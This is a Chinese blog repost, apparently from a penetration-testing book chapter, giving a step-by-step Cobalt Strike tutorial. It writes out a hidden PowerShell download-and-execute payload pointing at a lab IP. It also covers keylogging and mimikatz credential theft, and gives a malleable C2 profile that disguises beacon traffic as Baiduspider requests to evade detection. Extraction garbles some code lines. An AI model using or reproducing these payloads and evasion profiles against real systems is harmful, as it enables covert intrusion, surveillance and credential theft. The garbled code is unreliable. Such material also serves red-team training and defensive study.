Cobalt Strike 的使用及拓展

2024-02-12 06:12
文章标签 使用 拓展 cobalt strike

本文主要是介绍Cobalt Strike 的使用及拓展,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

 

Cobalt Strike是一款以Metasploit为基础的GUI框架式渗透测试工具,集成了端 口转发、服务扫描、 自动化溢出、多模式端口监听、exe 、PowerShell木马生成

等,主要用于团队作战,能让多个渗透者同时连接到团体服务器上,共享渗透资  源、 目标信息和sessions 。Cobalt Strike作为一款协同APT工具,其针对内网的渗   透测试和作为APT的控制终端的功能,使其变成众多APT组织的首选。运行Cobalt Strike时需要安装好Java环境,可以选择Oracle Java 1.8 、Oracle Java 11或OpenJDK 11进行安装。

Cobalt Strike 的基本架构如下:

── agscript 拓展脚本

── c2lint 检查 c2 通信配置文件错误

── cobaltstrike

── cobaltstrike .auth 认证文件

── cobaltstrike .jar 客户端主程序

── icon .jpg

── license .pdf

── logs 记录 cs 中所有事件,按日期格式区分

── readme .txt

── releasenotes .txt

── teamserver 团队服务器

── teamserver_win .bat

── third-party 第三方模块,下面是 vnc

├── README .winvnc .txt

────  winvnc(winvnc) .(.)x86(x64) .(.)d(d)l(l)l(l)

1.启动团队服务器

启动团队服务器(TeamServer),需要以root身份运行,并且需要添加两个 必选参数。第一个是团队服务器的外部可访问地址,第二个是用于团队成员将

Cobalt Strike客户端连接到团队服务器的密码。本节示例IP为192.168.111.128 ,登 录密码设置为test ,如图11-1所示。

6e635b0443d54d7d99967ff30dade6f2.png

图11-1    启动Cobalt Strike服务

2.连接团队服务器

 

 

 

 

 

b373a019bfa84b9981a5972287e3b4bc.png

图11-2    连接服务

在命令终端运行Cobalt Strike ,填写IP地址为192.168.111.128 ,Cobalt Strike启 动时的默认端口为50050 ,昵称可以根据自己的喜好填写,这里写成neo ,密码为 服务端启动时设置的密码admin ,详细配置信息如图11-2所示。

点击Connect按钮后便成功登录团队服务器。如图11-3所示为成功登录后的  Cobalt Strike运行界面。Cobalt Strike 的主界面主要分为菜单栏、快捷功能区、 目 标列表区、控制台命令输出区和控制台命令输入区。

·菜单栏:集成了Cobalt Strike 的所有功能。

· 快捷功能区:列出了常用功能。

· 目标列表区:根据不同的显示模式,显示已获取权限的主机及目标主机。

·控制台命令输出区:输出命令执行结果。

·控制台命令输入区:用户输入的命令。

 

 

 

 

 

b4c351183d7f448384115a96735f0b78.png

图11-3    登入服务

3.建立Listener

现在可以利用Cobalt Strike获取一个Beacon 。可以通过在菜单栏选择Cobalt Strike →Listeners命令进入Listeners面板,如图11-4所示。

9e43c67f5d8c41fd9c9dc4511237425b.png

图11-4    进入Listeners面板

 

 

 

 

在Listeners面板中点击Add按钮,新建一个监听器,如图11-5所示。

835c8d00790d46f1a415ceed26a2072a.png

图11-5    创建监听器

在弹出的对话框中点击Save按钮后会弹出一个窗口,依次在窗口中输入名

称、监听类型、Cobalt Strike运行服务的IP地址、监听端口号。其中,监听器一共 有9种类型,beacon系列为Cobalt Strike 自带类型,分别有DNS 、HTTP 、HTTPS 、 SMB 、TCP 。foreign系列用于配合外部监听器,可使用其他主机远程控制Cobalt    Strike 中的主机,一般配合MSF使用。这里选择监听器类型为HTTP方式,点击

Save按钮进行保存,如图11-6所示。

 

 

 

 

 

353181aeb403485c8c45741bc32c8f37.png

图11-6    HTTP方式监听

4.生成Payload

这里使用Web Delivery生成一个Payload 。在菜单栏中依次选择Attacks →Web Drive-by → Scripted Web Delivery命令,如图11-7所示。

d65dccd8f0a84b508574a87696dcb3be.png

图11-7    生成Payload

保持默认配置,选择已经创建的监听器,设置类型为powershell ,然后点击 Launch按钮,如图11-8所示。

点击Launch按钮以后,会出现一段powershell类型的Payload代码,如下所

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps263.png&pos_id=XzIWFfVI

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps264.png&pos_id=WFTE4UhW

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps265.png&pos_id=XTHn3dJq

powershell.exe -nop -w hidden -c "IEX ((new-object string('http://192.168.111.128 :80/a'))"

net.webclient) .download

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps266.png&pos_id=F8afjymN

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps267.png&pos_id=e8GJjXGD

05f2c66b3c874b348b83b3d4b8e3a289.png

图11-8    PowerShell方式

395b0a21aba54730bea932bbd3fa4501.png

图11-9    运行命令

执行该命令后便会回连,Cobalt Strike 目标列表中会显示目标服务器IP地址、 出口地址、当前用户、计算机名、当前Beacon的pid号以及响应时间,如图11-10   所示。

 

 

 

 

 

b71a5d0392d14c039fff7fe612101345.png

图11-10    成功回连

Cobalt Strike默认Beacon是60s响应一次。为了方便使用,这里设置成0s 。选  中需要操作的Beacon ,右击,然后选择Interact命令进入主机交互模式,如图11-11 所示。

在控制台命令输出区输入sleep 0命令后,等待60s ,此时便改成了与目标主机 进行实时响应,如图11-12所示。

除了以上的powershell类型反弹Beacon的方式以外,Listeners模块中也集成了 许多其他的Payload形式,如表11-2所示。

d126594cb00747aebda666965b1f36b4.png

图11-11    进入交互模式

 

 

 

 

 

49a745396c784f0186eac885ab2d6f3e.png

图11-12    修改时间

表11-2    Listener模块的所有Payload

d01f21838def4abcb3f2b1ecbe9e68f6.png

5.基本操作

Cobalt Strike工具集成了大量便捷的命令模式,简化了以后渗透攻击过程中复 杂的信息搜集、提权、跳板等一系列操作。例如,可以尝试使用ps命令,或者用  右击并选择Explore →Process list命令的方式查看当前进程,如图11-13和图11-14所 示。

 

 

 

 

 

df250b42272f4a6385fe07c58f3bdd57.png

图11-13    用命令行的方式查看进程

75cca48bf69241deadeba35c9b1e0ee3.png

图11-14    用右击的方式查看进程

使用screenshot命令对目标主机进行截屏,可通过View → Screenshots选项查看 截屏内容,如图11-15所示。

 

 

 

 

 

4898e84f4252416c8cda08282ba5b4b4.png

图11-15    查看截屏内容

同样,在Cobalt Strike 中也可以使用键盘记录功能,如图11-16所示。

47b6796d295b467a97ee05dcaa683c75.png

图11-16    键盘记录

用View →Keystokes选项查看键盘记录,如图11-17所示。

fd404072a4ed4cab966bb2ab8233eb39.png

图11-17    查看键盘记录

Cobalt Strike工具中还加入了mimikatz\logonpasswords等抓取凭证功能,可以 对目标主机进行口令抓取,如图11-18所示。

 

 

 

 

 

3cf0381b48bd41e89c4d3c87dea23ef8.png

图11-18    抓取凭证

Cobalt Strike 中集成的命令还有很多,此处就不一一介绍了,读者可在与目标 的交互界面中输入help或者“ ?”进行查询,执行结果如图11-19所示。

3974c12ef5ed433082bb467f7845888b.png

 

 

 

 

 

图11-19    查看功能信息

6.C2通信配置文件

为了保证通信过程中的数据更加安全可靠,我们也可以通过修改beacon特  征,伪装流量,来使通信更隐蔽,单一团队服务器只能加载一个profile 。这里通 过抓包来看一下Cobalt Strike 的默认通信特征,如下所示。

84369fa300f84f8fa1b769e5932abf9c.png

这里可以通过编写一个简单的C2配置来修改通信特征。我们可以模仿 baiduspider通信,建立一个baidu.profile文件。

1)设置项目名字:

 

set sample_name "Baidu Profile";

2)设置beacon每次回连的时间,系统默认为60s ,为了增加隐蔽性,此处设 置为1000s回连一次,如下所示:

set sleeptime "1000";

3)设置随机抖动时间:

set jitter "17";

4)设置baiduspider的User Agent标识:

set useragent "Mozilla/5 .0 (compatible; Baiduspider/2 .0; +http://www .baidu . com/search/spider .html)";

5)设置beacon http请求事件,这里使用Get方式模仿一个百度搜索的过程:

 

 

 

 

 

20230724024159.png?origin_url=file%3A%2F%2F%2FC%3A%5CUsers%5Clenovo%5CAppData%5CLocal%5CTemp%5Cksohtml5872%5Cwps284.jpg&pos_id=2wBqKfIY

server {

header "Server" "BWS/1 .0";

header "Set-Cookie" "delPer=0; path=/; domain= .baidu .com"; header "Cache- Control" "private";

header "Connection" "keep-alive";

header "Content-Encoding" "gzip";

header "Content-Type" "text/html;charset=utf-8";

header "Vary" "Accept-Encoding";

output {

prepend "<div><div id=\"__status\">-12</div><div id=\"__redirect\">0</div><div id=\"__switchtime\">0</div><div id=\"__querySign\">e95d0ebc1edd32aa</

div><script id=\"__sugPreInfo\">{\"prefix\" :\"ss\",\"presearch\" :\"0\", \"query\" : \"ss\",\"sug\" :\"\",\"ps\" :\"0 .000611\",\"ss\" :\"0 .000000\", \"debug\ " :\"0232\",\"wd\" :";

append "}</script></div>";

print;

}

}

client {

header "Accept" "*/*";

header "Accept-Language" "en,zh-CN;q=0 .9,zh;q=0 .8"; header "Host" "www .

baidu .com";

header "s_referer" "https://www .baidu .com/";

metadata {

mask;

base64url;

parameter "isid";

}

} }

6)使用Post的方式模拟百度搜索:

http-post {

set uri "/s/ie=utf-8&newi=1&mod=11&isbd=1";

server {

header "Server" "BWS/1 .0";

header "Set-Cookie" "delPer=0; path=/; domain= .baidu .com"; header "Cache- Control" "private";

header "Connection" "keep-alive";

header "Content-Encoding" "gzip";

header "Content-Type" "text/html;charset=utf-8";

header "Vary" "Accept-Encoding";

output {

prepend "<div><div id=\"__status\">-12</div><div id=\"__redirect\">0</div><div id=\"__switchtime\">0</div><div id=\"__querySign\">e95d0ebc1edd32aa</

div><script id=\"__sugPreInfo\">{\"prefix\" :\"ss\",\"presearch\" :\"0\", \"query\" : \"ss\",\"sug\" :\"\",\"ps\" :\"0 .000611\",\"ss\" :\"0 .000000\", \"debug\ " :\"0232\",\"wd\" :";

append "}</script></div>";

print;

}

}

client {

header "Accept" "*/*";

header "Accept-Language" "en,zh-CN;q=0 .9,zh;q=0 .8"; header "Host" "www .

baidu .com";

header "s_referer" "https://www .baidu .com/";

id {

parameter "isid";

}

output {

mask;

base64url;

print;

 

最后使用c2lint检查C2配置,如下所示。

80e966d55fc14484b385a1a48d85a69d.png

使用团队服务器加载刚刚编写好的C2配置文件,如下所示:

0d4e2aa6677a41a9a4e467043db6a977.png

加载完成后反弹一个shell看一下实际效果,如下所示:

c0f67640586242c4b75b8e4de9caf31a.png

使用Wireshark抓取数据包,查看通过C2配置文件后的流量情况,如图11-20

 

 

 

 

 

和图11-21所示。

b50749049a044edf8a99d8693ec3ddf1.png

图11-20    抓取的数据位置

92269c531717433bb63af5d904e359cd.png

图11-21    抓包的数据

通过抓取的数据包可以发现,所有流量都通过刚刚编写的文件进行了修改, 从而增加了shell的隐秘性。

 

 

这篇关于Cobalt Strike 的使用及拓展的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/701852

相关文章

使用Dify访问mysql数据库详细代码示例

《使用Dify访问mysql数据库详细代码示例》:本文主要介绍使用Dify访问mysql数据库的相关资料,并详细讲解了如何在本地搭建数据库访问服务,使用ngrok暴露到公网,并创建知识库、数据库访... 1、在本地搭建数据库访问的服务,并使用ngrok暴露到公网。#sql_tools.pyfrom

使用mvn deploy命令上传jar包的实现

《使用mvndeploy命令上传jar包的实现》本文介绍了使用mvndeploy:deploy-file命令将本地仓库中的JAR包重新发布到Maven私服,文中通过示例代码介绍的非常详细,对大家的学... 目录一、背景二、环境三、配置nexus上传账号四、执行deploy命令上传包1. 首先需要把本地仓中要

Spring Cloud之注册中心Nacos的使用详解

《SpringCloud之注册中心Nacos的使用详解》本文介绍SpringCloudAlibaba中的Nacos组件,对比了Nacos与Eureka的区别,展示了如何在项目中引入SpringClo... 目录Naacos服务注册/服务发现引⼊Spring Cloud Alibaba依赖引入Naco编程s依

Java springBoot初步使用websocket的代码示例

《JavaspringBoot初步使用websocket的代码示例》:本文主要介绍JavaspringBoot初步使用websocket的相关资料,WebSocket是一种实现实时双向通信的协... 目录一、什么是websocket二、依赖坐标地址1.springBoot父级依赖2.springBoot依赖

Java使用Mail构建邮件功能的完整指南

《Java使用Mail构建邮件功能的完整指南》JavaMailAPI是一个功能强大的工具,它可以帮助开发者轻松实现邮件的发送与接收功能,本文将介绍如何使用JavaMail发送和接收邮件,希望对大家有所... 目录1、简述2、主要特点3、发送样例3.1 发送纯文本邮件3.2 发送 html 邮件3.3 发送带

使用DeepSeek搭建个人知识库(在笔记本电脑上)

《使用DeepSeek搭建个人知识库(在笔记本电脑上)》本文介绍了如何在笔记本电脑上使用DeepSeek和开源工具搭建个人知识库,通过安装DeepSeek和RAGFlow,并使用CherryStudi... 目录部署环境软件清单安装DeepSeek安装Cherry Studio安装RAGFlow设置知识库总

Python FastAPI入门安装使用

《PythonFastAPI入门安装使用》FastAPI是一个现代、快速的PythonWeb框架,用于构建API,它基于Python3.6+的类型提示特性,使得代码更加简洁且易于绶护,这篇文章主要介... 目录第一节:FastAPI入门一、FastAPI框架介绍什么是ASGI服务(WSGI)二、FastAP

Spring-AOP-ProceedingJoinPoint的使用详解

《Spring-AOP-ProceedingJoinPoint的使用详解》:本文主要介绍Spring-AOP-ProceedingJoinPoint的使用方式,具有很好的参考价值,希望对大家有所帮... 目录ProceedingJoinPoijsnt简介获取环绕通知方法的相关信息1.proceed()2.g

Maven pom.xml文件中build,plugin标签的使用小结

《Mavenpom.xml文件中build,plugin标签的使用小结》本文主要介绍了Mavenpom.xml文件中build,plugin标签的使用小结,文中通过示例代码介绍的非常详细,对大家的学... 目录<build> 标签Plugins插件<build> 标签<build> 标签是 pom.XML

JAVA虚拟机中 -D, -X, -XX ,-server参数使用

《JAVA虚拟机中-D,-X,-XX,-server参数使用》本文主要介绍了JAVA虚拟机中-D,-X,-XX,-server参数使用,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有... 目录一、-D参数二、-X参数三、-XX参数总结:在Java开发过程中,对Java虚拟机(JVM)的启动参数进